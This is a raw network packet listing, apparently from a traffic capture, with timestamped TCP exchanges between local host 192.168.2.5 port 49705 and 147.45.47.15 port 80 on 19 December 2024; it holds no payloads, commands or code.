                                                                                                  Dec 19, 2024 08:52:55.629899025 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.630682945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.630784988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.630831003 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.631690979 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.631745100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.631791115 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.632611036 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.632757902 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.632827044 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.633517981 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.633541107 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.680056095 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.773739100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.773859978 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.773940086 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.774080992 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.774262905 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.774317980 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.775083065 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.775208950 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.775258064 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.776074886 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.776128054 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.776170969 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.777030945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.777084112 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.777128935 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.777975082 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.778093100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.778141022 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.778959036 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.779062986 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.779112101 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.779910088 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.780020952 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.780070066 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.780849934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.780944109 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.780986071 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.781805038 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.781907082 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.781955004 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.782787085 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.783066988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.783113956 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.783813000 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.783967972 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.784041882 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.784698963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.784828901 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.784873962 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.785681009 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.785784960 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.785841942 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.786645889 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.786750078 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.786799908 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.787605047 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.787837982 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.787884951 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.788589001 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.788706064 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.788750887 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.789551020 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.789655924 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.789707899 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.790515900 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.790632010 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.790684938 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.791481018 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.791625023 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.791677952 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.792457104 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.792555094 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.792602062 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.793426991 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.793543100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.793591022 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.794377089 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.794493914 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.794567108 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.795352936 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.795464039 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.795516014 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.796351910 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.796467066 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.796514034 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.797297001 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.797384024 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.797440052 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.798228025 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.798352957 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.798403978 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.799216986 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.799432039 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.799474955 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.800250053 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.800295115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.800350904 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.801171064 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.801265001 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.801316977 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.802198887 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.802279949 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.802615881 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.803117037 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.803263903 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.803328037 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.804059029 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.804183960 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.804236889 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.805032969 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.805186987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.805263042 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.806015968 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.806116104 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.806195974 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.807003021 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.807101011 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.807184935 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.807956934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.808062077 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.808137894 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.808907032 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.809041023 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.809125900 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.809901953 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.809993029 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.810049057 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.810874939 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.810972929 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.811028004 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.811806917 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.811872959 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.811923981 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.812525034 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.812848091 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.813055038 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.813106060 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.813764095 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.813879013 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.813965082 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.814707994 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.814822912 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.814877033 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.815704107 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.815792084 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.815844059 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.816648006 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.816761017 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.816823006 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.817655087 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.817761898 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.817817926 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.818578005 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.818705082 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.818756104 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.819566011 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.819686890 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.819766045 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.820614100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.820827961 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.820882082 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.821568966 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.821692944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.821748972 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.822474957 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.822593927 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.822696924 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.823416948 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.823525906 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.823575974 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.824337006 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.864063978 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.972799063 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.972891092 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.972971916 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.973191977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.973320961 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.973397017 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.974153042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.974262953 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.974318981 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.975155115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.975266933 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.975374937 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.976092100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.976201057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.976252079 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.977057934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.977183104 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.977233887 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.978032112 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.978133917 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.978185892 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.979002953 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.979166031 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.979217052 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.979958057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.980076075 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.980127096 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.980909109 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.981028080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.981082916 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.981892109 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.982019901 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.982062101 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.982857943 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.982976913 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.983020067 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.983820915 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.983922958 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.983994007 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.984775066 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.984908104 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.984985113 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.985766888 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.985862970 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.985917091 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.986730099 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.986797094 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.986843109 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.987653971 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.987838030 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.987884998 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.988727093 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.988893032 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.988960028 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.989723921 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.989873886 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.989921093 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.990613937 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.990777969 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.990819931 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.991571903 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.991734982 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.991782904 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.992598057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.992614031 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.992667913 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.993486881 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.993571043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.993613005 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.994446993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.994543076 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.994648933 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.995412111 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.995537043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.995604992 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.996409893 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.996520996 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.996565104 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.997329950 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.997490883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.997540951 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.998325109 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.998394966 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.998462915 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.999319077 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.999428034 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.999470949 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.000236034 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.000431061 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.000472069 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.001287937 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.001408100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.001450062 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.002207994 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.002336979 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.002381086 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.003204107 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.003321886 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.003376961 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.004110098 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.004256964 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.004300117 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.005206108 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.005309105 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.005378008 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.006079912 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.006201982 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.006251097 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.007126093 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.007232904 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.007277966 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.007973909 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.008102894 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.008146048 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.008944035 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.009105921 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.009227991 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.009973049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.010037899 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.010092020 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.010889053 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.011019945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.011085987 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.011888981 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.012023926 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.012088060 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.012856007 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.012952089 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.013004065 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.013803959 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.013916016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.013981104 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.014781952 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.014919043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.014971018 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.015737057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.015862942 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.015918016 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.016721964 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.016901016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.016951084 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.017664909 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.017848015 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.017905951 CET4970580192.168.2.5147.45.47.15
